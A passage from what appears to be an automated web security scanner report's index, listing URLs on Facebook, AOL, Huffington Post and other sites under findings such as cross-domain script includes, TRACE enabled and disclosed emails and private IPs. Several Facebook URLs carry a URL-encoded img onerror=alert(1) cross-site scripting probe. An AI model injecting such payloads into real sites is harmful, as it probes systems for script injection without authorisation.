16.73. http://www.facebook.com/r.php

16.74. http://www.facebook.com/r.php

16.75. http://www.facebook.com/share.php

16.76. http://www.facebook.com/sharer.php

16.77. http://www.facebook.com/terms.php

16.78. http://www.facebook.com/terms.php

16.79. http://www.flickr.com/badge_code_v2.gne

16.80. http://www.games.com/game/family-feud/

16.81. http://www.google.com/search

16.82. http://www.google.com/url

16.83. http://www.google.com/url

16.84. http://www.google.com/webhp

16.85. http://www.huffingtonpost.com/

16.86. http://www.huffingtonpost.com/

16.87. http://www.huffingtonpost.com/

16.88. http://www.huffingtonpost.com/blogs_front.html

16.89. http://www.huffingtonpost.com/news_col_1.html

16.90. http://www.huffingtonpost.com/news_col_2.html

16.91. http://www.huffingtonpost.com/permalink-tracker.html

16.92. http://www.huffingtonpost.com/threeup.php

16.93. http://www.mapquest.com/

16.94. http://www.mapquest.com/

16.95. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

16.96. http://yellowpages.aol.com/

17. Cross-domain script include

17.1. http://www.aim.com/products/express/

17.2. http://www.aol.com/

17.3. http://www.bankrate.com/funnel/mortgages/

17.4. http://www.blogsmithmedia.com/www.dailyfinance.com/media/dailyfinance.css

17.5. http://www.citysbest.com/

17.6. http://www.crunchboard.com/opening/detailjob.php

17.7. http://www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

17.8. http://www.dailyfinance.com/

17.9. http://www.dailyfinance.com/markets/mostactives

17.10. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

17.11. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

17.12. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

17.13. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

17.14. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

17.15. http://www.facebook.com/

17.16. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

17.17. http://www.facebook.com/10000082482078341583

17.18. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

17.19. http://www.facebook.com/1242845259

17.20. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

17.21. http://www.facebook.com/2008/fbml

17.22. http://www.facebook.com/AOLrealestate

17.23. http://www.facebook.com/BPAmerica

17.24. http://www.facebook.com/DailyFinance

17.25. http://www.facebook.com/HockeyKen

17.26. http://www.facebook.com/KickIceForever

17.27. http://www.facebook.com/LadyBonesie

17.28. http://www.facebook.com/Loizza

17.29. http://www.facebook.com/aim

17.30. http://www.facebook.com/ajax/intl/language_dialog.php

17.31. http://www.facebook.com/aol

17.32. http://www.facebook.com/aolradio

17.33. http://www.facebook.com/burkerkink

17.34. http://www.facebook.com/careers/

17.35. http://www.facebook.com/deedee.perez1

17.36. http://www.facebook.com/directory/pages/

17.37. http://www.facebook.com/directory/people/

17.38. http://www.facebook.com/facebook

17.39. http://www.facebook.com/fayse

17.40. http://www.facebook.com/find-friends

17.41. http://www.facebook.com/find-friends

17.42. http://www.facebook.com/gale.l.schenk

17.43. http://www.facebook.com/help/

17.44. http://www.facebook.com/help/

17.45. http://www.facebook.com/izaOllie

17.46. http://www.facebook.com/jezzas

17.47. http://www.facebook.com/kimberly.christ

17.48. http://www.facebook.com/ladonna.lokey

17.49. http://www.facebook.com/lakendra.roberts

17.50. http://www.facebook.com/login.php

17.51. http://www.facebook.com/matthew.oliveira2

17.52. http://www.facebook.com/mmafighting

17.53. http://www.facebook.com/mobile/

17.54. http://www.facebook.com/pages/Barnesville/115038011847083

17.55. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820

17.56. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478

17.57. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059

17.58. http://www.facebook.com/pages/Editor-in-Chief/137829579583400

17.59. http://www.facebook.com/pages/Gilco-Corporation/109823499042436

17.60. http://www.facebook.com/pages/HMFIC/149403761740008

17.61. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312

17.62. http://www.facebook.com/pages/Merchandiser/123981654314779

17.63. http://www.facebook.com/pages/New-Haven-College/130105783687523

17.64. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674

17.65. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680

17.66. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

17.67. http://www.facebook.com/pages/Sporting-News/104068362964496

17.68. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520

17.69. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

17.70. http://www.facebook.com/pages/create.php

17.71. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580

17.72. http://www.facebook.com/patroyo

17.73. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

17.74. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

17.75. http://www.facebook.com/people/Bucky-Jordan/100000824820783

17.76. http://www.facebook.com/plugins/activity.php

17.77. http://www.facebook.com/plugins/activity.php

17.78. http://www.facebook.com/plugins/comments.php

17.79. http://www.facebook.com/plugins/comments.php

17.80. http://www.facebook.com/plugins/facepile.php

17.81. http://www.facebook.com/plugins/facepile.php

17.82. http://www.facebook.com/plugins/like.php

17.83. http://www.facebook.com/plugins/likebox.php

17.84. http://www.facebook.com/plugins/likebox.php

17.85. http://www.facebook.com/plugins/recommendations.php

17.86. http://www.facebook.com/plugins/recommendations.php

17.87. http://www.facebook.com/plugins/send.php

17.88. http://www.facebook.com/plugins/send.php

17.89. http://www.facebook.com/policy.php

17.90. http://www.facebook.com/privacy/explanation.php

17.91. http://www.facebook.com/r.php

17.92. http://www.facebook.com/r.php

17.93. http://www.facebook.com/robynalys

17.94. http://www.facebook.com/share.php

17.95. http://www.facebook.com/sharer.php

17.96. http://www.facebook.com/skdarealist

17.97. http://www.facebook.com/sportingnews

17.98. http://www.facebook.com/stefanoboscolomarchi

17.99. http://www.facebook.com/techcrunch

17.100. http://www.facebook.com/terms.php

17.101. http://www.facebook.com/terms.php

17.102. http://www.facebook.com/theteebers

17.103. http://www.facebook.com/wmoppert

17.104. https://www.fightmagazine.com/mma-magazine/subscribe.asp

17.105. http://www.games.com/browse-games/all/

17.106. http://www.games.com/game-play/family-feud/single

17.107. http://www.games.com/game/family-feud/

17.108. https://www.godaddy.com/

17.109. https://www.godaddy.com/domains/search.aspx

17.110. https://www.godaddy.com/gdshop/hosting/landing.asp

17.111. http://www.huffingtonpost.com/

17.112. http://www.huffingtonpost.com/2011/05/02/

17.113. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html

17.114. http://www.huffingtonpost.com/2011/05/04/

17.115. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html

17.116. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html

17.117. http://www.huffingtonpost.com/advertise/

17.118. http://www.huffingtonpost.com/imam-feisal-abdul-rauf/bin-laden-terrorism_b_857345.html

17.119. http://www.huffingtonpost.com/newsinc/landing_page.html

17.120. http://www.huffingtonpost.com/permalink-tracker.html

17.121. http://www.huffingtonpost.com/rep-carolyn-maloney/the-cfpb-needs-to-get-to_b_857393.html

17.122. http://www.huffingtonpost.com/users/logout/

17.123. http://www.lakewoodbeacon.org/

17.124. http://www.mapquest.com/

17.125. http://www.mapquest.com/directions

17.126. http://www.mapquest.com/maps

17.127. http://www.mapquest.com/routeplanner

17.128. http://www.marketwatch.com/News/Story/Story.aspx

17.129. http://www.mmafighting.com/

17.130. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

17.131. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

17.132. http://www.mmawarehouse.com/

17.133. http://www.mmawarehouse.com/Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm

17.134. http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm

17.135. http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm

17.136. http://www.mmawarehouse.com/FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm

17.137. http://www.mmawarehouse.com/FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm

17.138. http://www.mmawarehouse.com/Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm

17.139. http://www.mmawarehouse.com/Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm

17.140. http://www.moviefone.com/

17.141. http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

17.142. http://www.popeater.com/

17.143. http://www.truveo.com/

17.144. http://www.truveo.com/client/versions/univ_ent/js/truveo.libs.util.v1304543460.js

17.145. http://www.truveo.com/search

17.146. http://www.tuaw.com/hub/app-reviews

17.147. http://yellowpages.aol.com/

18. TRACE method is enabled

18.1. http://www.aim.com/

18.2. http://www.aolnews.com/

18.3. http://www.citysbest.com/

18.4. http://www.crunchboard.com/

18.5. http://www.dailyfinance.com/

18.6. http://www.dooce.com/

18.7. http://www.mmafighting.com/

18.8. http://www.moviefone.com/

18.9. http://www.popeater.com/

18.10. http://www.truveo.com/

18.11. http://www.tuaw.com/

18.12. http://xml.truveo.com/

19. Email addresses disclosed

19.1. http://www.dailyfinance.com/markets/mostactives

19.2. http://www.games.com/browse-games/all/

19.3. http://www.games.com/game-play/family-feud/single

19.4. http://www.games.com/game/family-feud/

19.5. https://www.godaddy.com/

19.6. https://www.godaddy.com/domains/search.aspx

19.7. https://www.godaddy.com/gdshop/hosting/landing.asp

19.8. http://www.google.com/s

19.9. http://www.google.com/search

19.10. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html

19.11. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html

19.12. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html

19.13. http://www.lakewoodbeacon.org/

19.14. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

19.15. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

19.16. https://www.neodata.com/pub/snew/new_print.shtml

19.17. http://www.popeater.com/

19.18. http://www.truveo.com/client/versions/univ_ent/js/truveo.module.jquery.jmycarousel.v1304543462.js

20. Private IP addresses disclosed

20.1. http://www.crunchgear.com/wp-content/uploads/2011/05/Intel-22nm_Transistor_2.jpg

20.2. http://www.crunchgear.com/wp-content/uploads/2011/05/Screen-shot-2011-05-04-at-2.13.39-PM.jpg

20.3. http://www.facebook.com/

20.4. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

20.5. http://www.facebook.com/10000082482078341583

20.6. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

20.7. http://www.facebook.com/1242845259

20.8. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

20.9. http://www.facebook.com/2008/fbml

20.10. http://www.facebook.com/AOLrealestate

20.11. http://www.facebook.com/BPAmerica

20.12. http://www.facebook.com/BPAmerica

20.13. http://www.facebook.com/BPAmerica

20.14. http://www.facebook.com/DailyFinance

20.15. http://www.facebook.com/HockeyKen

20.16. http://www.facebook.com/KickIceForever

20.17. http://www.facebook.com/LadyBonesie

20.18. http://www.facebook.com/Loizza

20.19. http://www.facebook.com/aim

20.20. http://www.facebook.com/ajax/connect/feedback.php

20.21. http://www.facebook.com/ajax/connect/vote.php

20.22. http://www.facebook.com/ajax/connect/vote.php

20.23. http://www.facebook.com/ajax/connect/vote.php

20.24. http://www.facebook.com/ajax/connect/vote.php

20.25. http://www.facebook.com/ajax/intl/language_dialog.php

20.26. http://www.facebook.com/ajax/intl/language_dialog.php

20.27. http://www.facebook.com/ajax/intl/language_dialog.php

20.28. http://www.facebook.com/ajax/reg_birthday_help.php

20.29. http://www.facebook.com/ajax/register/logging.php

20.30. http://www.facebook.com/aol

20.31. http://www.facebook.com/aolradio

20.32. http://www.facebook.com/badges

20.33. http://www.facebook.com/badges

20.34. http://www.facebook.com/badges

20.35. http://www.facebook.com/burkerkink

20.36. http://www.facebook.com/campaign/landing.php

20.37. http://www.facebook.com/campaign/landing.php

20.38. http://www.facebook.com/campaign/landing.php

20.39. http://www.facebook.com/campaign/landing.php

20.40. http://www.facebook.com/captcha/tfbimage.php

20.41. http://www.facebook.com/captcha/tfbimage.php

20.42. http://www.facebook.com/careers/

20.43. http://www.facebook.com/careers/

20.44. http://www.facebook.com/careers/

20.45. http://www.facebook.com/deedee.perez1

20.46. http://www.facebook.com/directory/pages/

20.47. http://www.facebook.com/directory/people/

20.48. http://www.facebook.com/extern/login_status.php

20.49. http://www.facebook.com/extern/login_status.php

20.50. http://www.facebook.com/extern/login_status.php

20.51. http://www.facebook.com/extern/login_status.php

20.52. http://www.facebook.com/extern/login_status.php

20.53. http://www.facebook.com/extern/login_status.php

20.54. http://www.facebook.com/extern/login_status.php

20.55. http://www.facebook.com/extern/login_status.php

20.56. http://www.facebook.com/extern/login_status.php

20.57. http://www.facebook.com/extern/login_status.php

20.58. http://www.facebook.com/extern/login_status.php

20.59. http://www.facebook.com/extern/login_status.php

20.60. http://www.facebook.com/extern/login_status.php

20.61. http://www.facebook.com/extern/login_status.php

20.62. http://www.facebook.com/extern/login_status.php

20.63. http://www.facebook.com/extern/login_status.php

20.64. http://www.facebook.com/extern/login_status.php

20.65. http://www.facebook.com/extern/login_status.php

20.66. http://www.facebook.com/extern/login_status.php

20.67. http://www.facebook.com/extern/login_status.php

20.68. http://www.facebook.com/extern/login_status.php

20.69. http://www.facebook.com/extern/login_status.php

20.70. http://www.facebook.com/extern/login_status.php

20.71. http://www.facebook.com/extern/login_status.php

20.72. http://www.facebook.com/extern/login_status.php

20.73. http://www.facebook.com/extern/login_status.php

20.74. http://www.facebook.com/extern/login_status.php

20.75. http://www.facebook.com/extern/login_status.php

20.76. http://www.facebook.com/extern/login_status.php

20.77. http://www.facebook.com/extern/login_status.php

20.78. http://www.facebook.com/extern/login_status.php

20.79. http://www.facebook.com/extern/login_status.php

20.80. http://www.facebook.com/extern/login_status.php

20.81. http://www.facebook.com/extern/login_status.php

20.82. http://www.facebook.com/extern/login_status.php

20.83. http://www.facebook.com/extern/login_status.php

20.84. http://www.facebook.com/extern/login_status.php

20.85. http://www.facebook.com/extern/login_status.php

20.86. http://www.facebook.com/extern/login_status.php

20.87. http://www.facebook.com/extern/login_status.php

20.88. http://www.facebook.com/extern/login_status.php

20.89. http://www.facebook.com/extern/login_status.php

20.90. http://www.facebook.com/extern/login_status.php

20.91. http://www.facebook.com/extern/login_status.php

20.92. http://www.facebook.com/extern/login_status.php

20.93. http://www.facebook.com/extern/login_status.php

20.94. http://www.facebook.com/extern/login_status.php

20.95. http://www.facebook.com/extern/login_status.php

20.96. http://www.facebook.com/extern/login_status.php

20.97. http://www.facebook.com/extern/login_status.php

20.98. http://www.facebook.com/extern/login_status.php

20.99. http://www.facebook.com/extern/login_status.php

20.100. http://www.facebook.com/extern/login_status.php

20.101. http://www.facebook.com/extern/login_status.php

20.102. http://www.facebook.com/extern/login_status.php

20.103. http://www.facebook.com/extern/login_status.php

20.104. http://www.facebook.com/extern/login_status.php

20.105. http://www.facebook.com/extern/login_status.php

20.106. http://www.facebook.com/extern/login_status.php

20.107. http://www.facebook.com/extern/login_status.php

20.108. http://www.facebook.com/extern/login_status.php

20.109. http://www.facebook.com/extern/login_status.php

20.110. http://www.facebook.com/extern/login_status.php

20.111. http://www.facebook.com/extern/login_status.php

20.112. http://www.facebook.com/extern/login_status.php

20.113. http://www.facebook.com/extern/login_status.php

20.114. http://www.facebook.com/extern/login_status.php

20.115. http://www.facebook.com/extern/login_status.php

20.116. http://www.facebook.com/extern/login_status.php

20.117. http://www.facebook.com/extern/login_status.php

20.118. http://www.facebook.com/extern/login_status.php

20.119. http://www.facebook.com/extern/login_status.php

20.120. http://www.facebook.com/extern/login_status.php

20.121. http://www.facebook.com/extern/login_status.php

20.122. http://www.facebook.com/extern/login_status.php

20.123. http://www.facebook.com/extern/login_status.php

20.124. http://www.facebook.com/extern/login_status.php

20.125. http://www.facebook.com/extern/login_status.php

20.126. http://www.facebook.com/extern/login_status.php

20.127. http://www.facebook.com/extern/login_status.php

20.128. http://www.facebook.com/extern/login_status.php

20.129. http://www.facebook.com/extern/login_status.php

20.130. http://www.facebook.com/extern/login_status.php

20.131. http://www.facebook.com/extern/login_status.php

20.132. http://www.facebook.com/extern/login_status.php

20.133. http://www.facebook.com/extern/login_status.php

20.134. http://www.facebook.com/extern/login_status.php

20.135. http://www.facebook.com/extern/login_status.php

20.136. http://www.facebook.com/extern/login_status.php

20.137. http://www.facebook.com/extern/login_status.php

20.138. http://www.facebook.com/extern/login_status.php

20.139. http://www.facebook.com/extern/login_status.php

20.140. http://www.facebook.com/extern/login_status.php

20.141. http://www.facebook.com/extern/login_status.php

20.142. http://www.facebook.com/extern/login_status.php

20.143. http://www.facebook.com/extern/login_status.php

20.144. http://www.facebook.com/extern/login_status.php

20.145. http://www.facebook.com/extern/login_status.php

20.146. http://www.facebook.com/extern/login_status.php

20.147. http://www.facebook.com/extern/login_status.php

20.148. http://www.facebook.com/extern/login_status.php

20.149. http://www.facebook.com/extern/login_status.php

20.150. http://www.facebook.com/extern/login_status.php

20.151. http://www.facebook.com/extern/login_status.php

20.152. http://www.facebook.com/extern/login_status.php

20.153. http://www.facebook.com/extern/login_status.php

20.154. http://www.facebook.com/extern/login_status.php

20.155. http://www.facebook.com/extern/login_status.php

20.156. http://www.facebook.com/extern/login_status.php

20.157. http://www.facebook.com/extern/login_status.php

20.158. http://www.facebook.com/extern/login_status.php

20.159. http://www.facebook.com/extern/login_status.php

20.160. http://www.facebook.com/extern/login_status.php

20.161. http://www.facebook.com/extern/login_status.php

20.162. http://www.facebook.com/extern/login_status.php

20.163. http://www.facebook.com/extern/login_status.php

20.164. http://www.facebook.com/extern/login_status.php

20.165. http://www.facebook.com/extern/login_status.php

20.166. http://www.facebook.com/extern/login_status.php

20.167. http://www.facebook.com/extern/login_status.php

20.168. http://www.facebook.com/extern/login_status.php

20.169. http://www.facebook.com/extern/login_status.php

20.170. http://www.facebook.com/extern/login_status.php

20.171. http://www.facebook.com/extern/login_status.php

20.172. http://www.facebook.com/extern/login_status.php

20.173. http://www.facebook.com/extern/login_status.php

20.174. http://www.facebook.com/extern/login_status.php

20.175. http://www.facebook.com/extern/login_status.php

20.176. http://www.facebook.com/extern/login_status.php

20.177. http://www.facebook.com/extern/login_status.php

20.178. http://www.facebook.com/extern/login_status.php

20.179. http://www.facebook.com/extern/login_status.php

20.180. http://www.facebook.com/extern/login_status.php

20.181. http://www.facebook.com/extern/login_status.php

20.182. http://www.facebook.com/extern/login_status.php

20.183. http://www.facebook.com/extern/login_status.php

20.184. http://www.facebook.com/extern/login_status.php

20.185. http://www.facebook.com/extern/login_status.php

20.186. http://www.facebook.com/extern/login_status.php

20.187. http://www.facebook.com/facebook

20.188. http://www.facebook.com/favicon.ico

20.189. http://www.facebook.com/fayse

20.190. http://www.facebook.com/find-friends

20.191. http://www.facebook.com/find-friends

20.192. http://www.facebook.com/find-friends

20.193. http://www.facebook.com/find-friends

20.194. http://www.facebook.com/gale.l.schenk

20.195. http://www.facebook.com/help/

20.196. http://www.facebook.com/help/

20.197. http://www.facebook.com/help/

20.198. http://www.facebook.com/help/

20.199. http://www.facebook.com/help/

20.200. http://www.facebook.com/home.php

20.201. http://www.facebook.com/images/policy/TRUSTe_EU.png

20.202. http://www.facebook.com/images/policy/TRUSTe_verify.png

20.203. http://www.facebook.com/izaOllie

20.204. http://www.facebook.com/jezzas

20.205. http://www.facebook.com/kimberly.christ

20.206. http://www.facebook.com/ladonna.lokey

20.207. http://www.facebook.com/lakendra.roberts

20.208. http://www.facebook.com/login.php

20.209. http://www.facebook.com/login.php

20.210. http://www.facebook.com/mapquest

20.211. http://www.facebook.com/matthew.oliveira2

20.212. http://www.facebook.com/mmafighting

20.213. http://www.facebook.com/mobile

20.214. http://www.facebook.com/mobile

20.215. http://www.facebook.com/mobile

20.216. http://www.facebook.com/mobile

20.217. http://www.facebook.com/mobile/

20.218. http://www.facebook.com/mobile/

20.219. http://www.facebook.com/mobile/

20.220. http://www.facebook.com/mobile/

20.221. http://www.facebook.com/pages/Barnesville/115038011847083

20.222. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820

20.223. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478

20.224. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059

20.225. http://www.facebook.com/pages/Editor-in-Chief/137829579583400

20.226. http://www.facebook.com/pages/Gilco-Corporation/109823499042436

20.227. http://www.facebook.com/pages/HMFIC/149403761740008

20.228. http://www.facebook.com/pages/HuffPost-World/70242384902

20.229. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312

20.230. http://www.facebook.com/pages/Merchandiser/123981654314779

20.231. http://www.facebook.com/pages/New-Haven-College/130105783687523

20.232. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674

20.233. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680

20.234. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

20.235. http://www.facebook.com/pages/Sporting-News/104068362964496

20.236. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520

20.237. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

20.238. http://www.facebook.com/pages/create.php

20.239. http://www.facebook.com/pages/create.php

20.240. http://www.facebook.com/pages/create.php

20.241. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580

20.242. http://www.facebook.com/patroyo

20.243. http://www.facebook.com/people/Alexander-Bucky%20-Jordan/1242845259

20.244. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

20.245. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

20.246. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783

20.247. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783

20.248. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783

20.249. http://www.facebook.com/people/Bucky-Jordan/100000824820783

20.250. http://www.facebook.com/people/Bucky-Jordan/100000824820783

20.251. http://www.facebook.com/people/Bucky-Jordan/100000824820783

20.252. http://www.facebook.com/people/Bucky-Jordan/100000824820783/x22

20.253. http://www.facebook.com/plugins/activity.php

20.254. http://www.facebook.com/plugins/activity.php

20.255. http://www.facebook.com/plugins/activity.php

20.256. http://www.facebook.com/plugins/activity.php

20.257. http://www.facebook.com/plugins/activity.php

20.258. http://www.facebook.com/plugins/activity.php

20.259. http://www.facebook.com/plugins/activity.php

20.260. http://www.facebook.com/plugins/activity.php

20.261. http://www.facebook.com/plugins/activity.php

20.262. http://www.facebook.com/plugins/activity.php

20.263. http://www.facebook.com/plugins/activity.php

20.264. http://www.facebook.com/plugins/activity.php

20.265. http://www.facebook.com/plugins/activity.php

20.266. http://www.facebook.com/plugins/activity.php

20.267. http://www.facebook.com/plugins/activity.php

20.268. http://www.facebook.com/plugins/activity.php

20.269. http://www.facebook.com/plugins/activity.php

20.270. http://www.facebook.com/plugins/activity.php

20.271. http://www.facebook.com/plugins/activity.php

20.272. http://www.facebook.com/plugins/activity.php

20.273. http://www.facebook.com/plugins/activity.php

20.274. http://www.facebook.com/plugins/activity.php

20.275. http://www.facebook.com/plugins/activity.php

20.276. http://www.facebook.com/plugins/activity.php

20.277. http://www.facebook.com/plugins/activity.php

20.278. http://www.facebook.com/plugins/activity.php

20.279. http://www.facebook.com/plugins/activity.php

20.280. http://www.facebook.com/plugins/activity.php

20.281. http://www.facebook.com/plugins/activity.php

20.282. http://www.facebook.com/plugins/activity.php

20.283. http://www.facebook.com/plugins/activity.php

20.284. http://www.facebook.com/plugins/activity.php

20.285. http://www.facebook.com/plugins/activity.php

20.286. http://www.facebook.com/plugins/activity.php

20.287. http://www.facebook.com/plugins/activity.php

20.288. http://www.facebook.com/plugins/activity.php

20.289. http://www.facebook.com/plugins/activity.php

20.290. http://www.facebook.com/plugins/activity.php

20.291. http://www.facebook.com/plugins/activity.php

20.292. http://www.facebook.com/plugins/activity.php

20.293. http://www.facebook.com/plugins/activity.php

20.294. http://www.facebook.com/plugins/activity.php

20.295. http://www.facebook.com/plugins/activity.php

20.296. http://www.facebook.com/plugins/activity.php

20.297. http://www.facebook.com/plugins/activity.php

20.298. http://www.facebook.com/plugins/activity.php

20.299. http://www.facebook.com/plugins/activity.php

20.300. http://www.facebook.com/plugins/activity.php

20.301. http://www.facebook.com/plugins/activity.php

20.302. http://www.facebook.com/plugins/activity.php

20.303. http://www.facebook.com/plugins/activity.php

20.304. http://www.facebook.com/plugins/activity.php

20.305. http://www.facebook.com/plugins/activity.php

20.306. http://www.facebook.com/plugins/activity.php

20.307. http://www.facebook.com/plugins/activity.php

20.308. http://www.facebook.com/plugins/activity.php

20.309. http://www.facebook.com/plugins/activity.php

20.310. http://www.facebook.com/plugins/activity.php

20.311. http://www.facebook.com/plugins/activity.php

20.312. http://www.facebook.com/plugins/activity.php

20.313. http://www.facebook.com/plugins/activity.php

20.314. http://www.facebook.com/plugins/activity.php

20.315. http://www.facebook.com/plugins/activity.php

20.316. http://www.facebook.com/plugins/comments.php

20.317. http://www.facebook.com/plugins/comments.php

20.318. http://www.facebook.com/plugins/comments.php

20.319. http://www.facebook.com/plugins/comments.php

20.320. http://www.facebook.com/plugins/comments.php

20.321. http://www.facebook.com/plugins/facepile.php

20.322. http://www.facebook.com/plugins/facepile.php

20.323. http://www.facebook.com/plugins/facepile.php

20.324. http://www.facebook.com/plugins/facepile.php

20.325. http://www.facebook.com/plugins/facepile.php

20.326. http://www.facebook.com/plugins/facepile.php

20.327. http://www.facebook.com/plugins/facepile.php

20.328. http://www.facebook.com/plugins/facepile.php

20.329. http://www.facebook.com/plugins/facepile.php

20.330. http://www.facebook.com/plugins/like.php

20.331. http://www.facebook.com/plugins/like.php

20.332. http://www.facebook.com/plugins/like.php

20.333. http://www.facebook.com/plugins/like.php

20.334. http://www.facebook.com/plugins/like.php

20.335. http://www.facebook.com/plugins/like.php

20.336. http://www.facebook.com/plugins/like.php

20.337. http://www.facebook.com/plugins/like.php

20.338. http://www.facebook.com/plugins/like.php

20.339. http://www.facebook.com/plugins/like.php

20.340. http://www.facebook.com/plugins/like.php

20.341. http://www.facebook.com/plugins/like.php

20.342. http://www.facebook.com/plugins/like.php

20.343. http://www.facebook.com/plugins/like.php

20.344. http://www.facebook.com/plugins/like.php

20.345. http://www.facebook.com/plugins/like.php

20.346. http://www.facebook.com/plugins/like.php

20.347. http://www.facebook.com/plugins/like.php

20.348. http://www.facebook.com/plugins/like.php

20.349. http://www.facebook.com/plugins/like.php

20.350. http://www.facebook.com/plugins/like.php

20.351. http://www.facebook.com/plugins/like.php

20.352. http://www.facebook.com/plugins/like.php

20.353. http://www.facebook.com/plugins/like.php

20.354. http://www.facebook.com/plugins/like.php

20.355. http://www.facebook.com/plugins/like.php

20.356. http://www.facebook.com/plugins/like.php

20.357. http://www.facebook.com/plugins/like.php

20.358. http://www.facebook.com/plugins/like.php

20.359. http://www.facebook.com/plugins/like.php

20.360. http://www.facebook.com/plugins/like.php

20.361. http://www.facebook.com/plugins/like.php

20.362. http://www.facebook.com/plugins/like.php

20.363. http://www.facebook.com/plugins/like.php

20.364. http://www.facebook.com/plugins/like.php

20.365. http://www.facebook.com/plugins/like.php

20.366. http://www.facebook.com/plugins/like.php

20.367. http://www.facebook.com/plugins/like.php

20.368. http://www.facebook.com/plugins/like.php

20.369. http://www.facebook.com/plugins/like.php

20.370. http://www.facebook.com/plugins/like.php

20.371. http://www.facebook.com/plugins/like.php

20.372. http://www.facebook.com/plugins/like.php

20.373. http://www.facebook.com/plugins/like.php

20.374. http://www.facebook.com/plugins/like.php

20.375. http://www.facebook.com/plugins/like.php

20.376. http://www.facebook.com/plugins/like.php

20.377. http://www.facebook.com/plugins/like.php

20.378. http://www.facebook.com/plugins/like.php

20.379. http://www.facebook.com/plugins/like.php

20.380. http://www.facebook.com/plugins/like.php

20.381. http://www.facebook.com/plugins/like.php

20.382. http://www.facebook.com/plugins/like.php

20.383. http://www.facebook.com/plugins/like.php

20.384. http://www.facebook.com/plugins/like.php

20.385. http://www.facebook.com/plugins/like.php

20.386. http://www.facebook.com/plugins/like.php

